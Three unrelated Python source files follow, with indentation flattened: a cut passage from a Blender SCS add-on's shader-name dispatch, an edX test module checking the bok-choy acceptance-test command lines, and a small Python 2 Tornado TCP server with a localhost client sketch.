from io_scs_tools.internals.shaders.eut2.shadowmap import Shadowmap as Shader
elif effect.startswith("flare"):
from io_scs_tools.internals.shaders.eut2.flare import Flare as Shader
elif effect.startswith("decalshadow"):
from io_scs_tools.internals.shaders.eut2.decalshadow import Decalshadow as Shader
elif effect.startswith("dif.spec.over.dif.opac"):
from io_scs_tools.internals.shaders.eut2.dif_spec_over_dif_opac import DifSpecOverDifOpac as Shader
elif effect.startswith("dif.spec.mult.dif.spec.iamod.dif.spec"):
from io_scs_tools.internals.shaders.eut2.dif_spec_mult_dif_spec_iamod_dif_spec import DifSpecMultDifSpecIamodDifSpec as Shader
elif effect.startswith("dif.spec.mult.dif.spec.add.env"):
from io_scs_tools.internals.shaders.eut2.dif_spec_mult_dif_spec.add_env import DifSpecMultDifSpecAddEnv as Shader
elif effect.startswith("dif.spec.mult.dif.spec"):
from io_scs_tools.internals.shaders.eut2.dif_spec_mult_dif_spec import DifSpecMultDifSpec as Shader
elif effect.startswith("dif.spec.add.env.nofresnel"):
from io_scs_tools.internals.shaders.eut2.dif_spec_add_env.nofresnel import DifSpecAddEnvNoFresnel as Shader
elif effect.startswith("building.add.env.day"):
from io_scs_tools.internals.shaders.eut2.building.add_env_day import BuildingAddEnvDay as Shader
elif effect.startswith("building.lvcol.day"):
from io_scs_tools.internals.shaders.eut2.building.lvcol_day import BuildingLvcolDay as Shader
elif effect.startswith("building.day"):
from io_scs_tools.internals.shaders.eut2.building.day import BuildingDay as Shader
elif effect.startswith("dif.weight.dif"):
from io_scs_tools.internals.shaders.eut2.dif_weight_dif import DifWeightDif as Shader
elif effect.startswith("dif.spec.add.env"):
from io_scs_tools.internals.shaders.eut2.dif_spec_add_env import DifSpecAddEnv as Shader
elif effect.startswith("dif.spec.fade.dif.spec"):
from io_scs_tools.internals.shaders.eut2.dif_spec_fade_dif_spec import DifSpecFadeDifSpec as Shader
elif effect.startswith("dif.spec.oclu.add.env"):
from io_scs_tools.internals.shaders.eut2.dif_spec_oclu_add_env import DifSpecOcluAddEnv as Shader
elif effect.startswith("dif.spec.oclu.weight.add.env"):
from io_scs_tools.internals.shaders.eut2.dif_spec_oclu_weight_add_env import DifSpecOcluWeightAddEnv as Shader
elif effect.startswith("dif.spec.weight.add.env"):
from io_scs_tools.internals.shaders.eut2.dif_spec_weight_add_env import DifSpecWeightAddEnv as Shader
elif effect.startswith("dif.spec.weight.weight.dif.spec.weight"):
from io_scs_tools.internals.shaders.eut2.dif_spec_weight_weight_dif_spec_weight import DifSpecWeightWeightDifSpecWeight as Shader
elif effect.startswith("dif.spec.weight.mult2.weight2"):
from io_scs_tools.internals.shaders.eut2.dif_spec_weight_mult2_weight2 import DifSpecWeightMult2Weight2 as Shader
elif effect.startswith("dif.spec.weight.mult2"):
from io_scs_tools.internals.shaders.eut2.dif_spec_weight_mult2 import DifSpecWeightMult2 as Shader
elif effect.startswith("dif.spec.weight"):
from io_scs_tools.internals.shaders.eut2.dif_spec_weight import DifSpecWeight as Shader
elif effect.startswith("dif.spec.oclu"):
from io_scs_tools.internals.shaders.eut2.dif_spec_oclu import DifSpecOclu as Shader
elif effect.startswith("dif.spec"):
from io_scs_tools.internals.shaders.eut2.dif_spec import DifSpec as Shader
elif effect.startswith("dif.lum.spec"):
from io_scs_tools.internals.shaders.eut2.dif_lum_spec import DifLumSpec as Shader
elif effect.startswith("dif.lum"):
from io_scs_tools.internals.shaders.eut2.dif_lum import DifLum as Shader
elif effect.startswith("dif.anim"):
from io_scs_tools.internals.shaders.eut2.dif_anim import DifAnim as Shader
elif effect.startswith("dif"):
from io_scs_tools.internals.shaders.eut2.dif import Dif as Shader
else:
return None
return Shader
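# Note on the dispatch above (descriptive only, no behavioural change implied):
# because matching is done with str.startswith in source order, the more
# specific effect names must stay listed before their shorter prefixes, e.g.
# "dif.spec.add.env.nofresnel" before "dif.spec.add.env", and
# "dif.spec.weight.mult2.weight2" before "dif.spec.weight.mult2" before
# "dif.spec.weight" before "dif.spec".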
|
"""
Tests for the bok-choy paver commands themselves.
Run just this test with: paver test_lib -t pavelib/paver_tests/test_paver_bok_choy_cmds.py
"""
from __future__ import absolute_import
import os
import unittest
import six
if six.PY2:
from test.test_support import EnvironmentVarGuard
else:
from test.support import EnvironmentVarGuard # pylint: disable=import-error,no-name-in-module
from pavelib.utils.test.suites import BokChoyTestSuite
REPO_DIR = os.getcwd()
class TestPaverBokChoyCmd(unittest.TestCase):
"""
Paver Bok Choy Command test cases
"""
def _expected_command(self, name, store=None, verify_xss=True):
"""
Returns the command that is expected to be run for the given test spec
and store.
"""
shard_str = '/shard_' + self.shard if self.shard else ''
expected_statement = [
"DEFAULT_STORE={}".format(store),
"SCREENSHOT_DIR='{}/test_root/log{}'".format(REPO_DIR, shard_str),
"BOK_CHOY_HAR_DIR='{}/test_root/log{}/hars'".format(REPO_DIR, shard_str),
"BOKCHOY_A11Y_CUSTOM_RULES_FILE='{}/{}'".format(
REPO_DIR,
'node_modules/edx-custom-a11y-rules/lib/custom_a11y_rules.js'
),
"SELENIUM_DRIVER_LOG_DIR='{}/test_root/log{}'".format(REPO_DIR, shard_str),
"VERIFY_XSS='{}'".format(verify_xss),
"python",
"-Wd",
"-m",
"pytest",
"{}/common/test/acceptance/{}".format(REPO_DIR, name),
"--junitxml={}/reports/bok_choy{}/xunit.xml".format(REPO_DIR, shard_str),
"--verbose",
]
return expected_statement
def setUp(self):
super(TestPaverBokChoyCmd, self).setUp()
self.shard = os.environ.get('SHARD')
self.env_var_override = EnvironmentVarGuard()
def test_default(self):
suite = BokChoyTestSuite('')
name = 'tests'
self.assertEqual(suite.cmd, self._expected_command(name=name))
def test_suite_spec(self):
spec = 'test_foo.py'
suite = BokChoyTestSuite('', test_spec=spec)
name = 'tests/{}'.format(spec)
self.assertEqual(suite.cmd, self._expected_command(name=name))
def test_class_spec(self):
spec = 'test_foo.py:FooTest'
suite = BokChoyTestSuite('', test_spec=spec)
name = 'tests/{}'.format(spec)
self.assertEqual(suite.cmd, self._expected_command(name=name))
def test_testcase_spec(self):
spec = 'test_foo.py:FooTest.test_bar'
suite = BokChoyTestSuite('', test_spec=spec)
name = 'tests/{}'.format(spec)
self.assertEqual(suite.cmd, self._expected_command(name=name))
def test_spec_with_draft_default_store(self):
spec = 'test_foo.py'
suite = BokChoyTestSuite('', test_spec=spec, default_store='draft')
name = 'tests/{}'.format(spec)
self.assertEqual(
suite.cmd,
self._expected_command(name=name, store='draft')
)
def test_invalid_default_store(self):
# the cmd will dumbly compose whatever we pass in for the default_store
suite = BokChoyTestSuite('', default_store='invalid')
name = 'tests'
self.assertEqual(
suite.cmd,
self._expected_command(name=name, store='invalid')
)
def test_serversonly(self):
suite = BokChoyTestSuite('', serversonly=True)
self.assertEqual(suite.cmd, None)
def test_verify_xss(self):
suite = BokChoyTestSuite('', verify_xss=True)
name = 'tests'
self.assertEqual(suite.cmd, self._expected_command(name=name, verify_xss=True))
def test_verify_xss_env_var(self):
self.env_var_override.set('VERIFY_XSS', 'False')
with self.env_var_override:
suite = BokChoyTestSuite('')
name = 'tests'
self.assertEqual(suite.cmd, self._expected_command(name=name, verify_xss=False))
def test_test_dir(self):
test_dir = 'foo'
suite = BokChoyTestSuite('', test_dir=test_dir)
self.assertEqual(
suite.cmd,
self._expected_command(name=test_dir)
)
def test_verbosity_settings_1_process(self):
"""
Using 1 process means paver should ask for the traditional xunit plugin for plugin results
"""
expected_verbosity_command = [
"--junitxml={repo_dir}/reports/bok_choy{shard_str}/xunit.xml".format(
repo_dir=REPO_DIR,
shard_str='/shard_' + self.shard if self.shard else ''
),
"--verbose",
]
suite = BokChoyTestSuite('', num_processes=1)
self.assertEqual(suite.verbosity_processes_command, expected_verbosity_command)
def test_verbosity_settings_2_processes(self):
"""
Using multiple processes means specific xunit, coloring, and process-related settings should
be used.
"""
process_count = 2
expected_verbosity_command = [
"--junitxml={repo_dir}/reports/bok_choy{shard_str}/xunit.xml".format(
repo_dir=REPO_DIR,
shard_str='/shard_' + self.shard if self.shard else '',
),
u"-n {}".format(process_count),
"--color=no",
"--verbose",
]
suite = BokChoyTestSuite('', num_processes=process_count)
self.assertEqual(suite.verbosity_processes_command, expected_verbosity_command)
def test_verbosity_settings_3_processes(self):
"""
With the above test, validate that num_processes can be set to various values
"""
process_count = 3
expected_verbosity_command = [
"--junitxml={repo_dir}/reports/bok_choy{shard_str}/xunit.xml".format(
repo_dir=REPO_DIR,
shard_str='/shard_' + self.shard if self.shard else '',
),
u"-n {}".format(process_count),
"--color=no",
"--verbose",
]
suite = BokChoyTestSuite('', num_processes=process_count)
self.assertEqual(suite.verbosity_processes_command, expected_verbosity_command)
|
#!/usr/bin/env python2.7
# -*- coding: utf-8 -*-
from tornado import ioloop, httpclient, gen
from tornado.gen import Task
from tornado.tcpserver import TCPServer
import pdb, time, logging
from tornado import stack_context
from tornado.escape import native_str
#Init logging
def init_logging():
logger = logging.getLogger()
logger.setLevel(logging.DEBUG)
sh = logging.StreamHandler()
formatter = logging.Formatter('%(asctime)s -%(module)s:%(filename)s-L%(lineno)d-%(levelname)s: %(message)s')
sh.setFormatter(formatter)
logger.addHandler(sh)
logging.info("Current log level is : %s", logging.getLevelName(logger.getEffectiveLevel()))
class MyServer(TCPServer):
def __init__(self, io_loop=None, **kwargs):
TCPServer.__init__(self, io_loop=io_loop, **kwargs)
def handle_stream(self, stream, address):
TCPConnection(stream, address, io_loop=self.io_loop)
class TCPConnection(object):
def __init__(self, stream, address, io_loop):
self.io_loop = io_loop
self.stream = stream
self.address = address
self.address_family = stream.socket.family
self.EOF = b' END'
self._clear_request_state()
self._message_callback = stack_context.wrap(self._on_message)
self.stream.set_close_callback(self._on_connection_close)
self.stream.read_until(self.EOF, self._message_callback)
def _on_timeout(self):
logging.info("Send message..")
self.write("Hello client!" + self.EOF)
def _on_message(self, data):
try:
timeout = 5
data = native_str(data.decode('latin1'))
logging.info("Received: %s", data)
self.io_loop.add_timeout(self.io_loop.time() + timeout, self._on_timeout)
except Exception, ex:
logging.error("Exception: %s", str(ex))
def _clear_request_state(self):
"""Clears the per-request state.
"""
self._write_callback = None
self._close_callback = None
def set_close_callback(self, callback):
"""Sets a callback that will be run when the connection is closed.
"""
self._close_callback = stack_context.wrap(callback)
def _on_connection_close(self):
if self._close_callback is not None:
callback = self._close_callback
self._close_callback = None
callback()
self._clear_request_state()
def close(self):
self.stream.close()
        # Remove this reference to self, which would otherwise cause a
        # cycle and delay garbage collection of this connection.
self._clear_request_state()
def write(self, chunk, callback=None):
"""Writes a chunk of output to the stream."""
if not self.stream.closed():
self._write_callback = stack_context.wrap(callback)
self.stream.write(chunk, self._on_write_complete)
def _on_write_complete(self):
if self._write_callback is not None:
callback = self._write_callback
self._write_callback = None
callback()
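# A minimal client sketch for manual testing (assumption: the server above is
# already running on localhost:8001; this helper is not part of the original
# script and is never called automatically).
def example_client():
    import socket
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(("127.0.0.1", 8001))
    # the server reads until the b' END' marker (see TCPConnection.EOF)
    s.sendall("Hello server! END")
    # the reply arrives roughly 5 seconds later (see _on_timeout)
    print s.recv(1024)
    s.close()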
def main():
init_logging()
server = MyServer()
server.listen(8001)
ioloop.IOLoop.instance().start()
if __name__ == "__main__":
try:
main()
except Exception, ex:
print "Ocurred Exception: %s" % str(ex)
quit()
|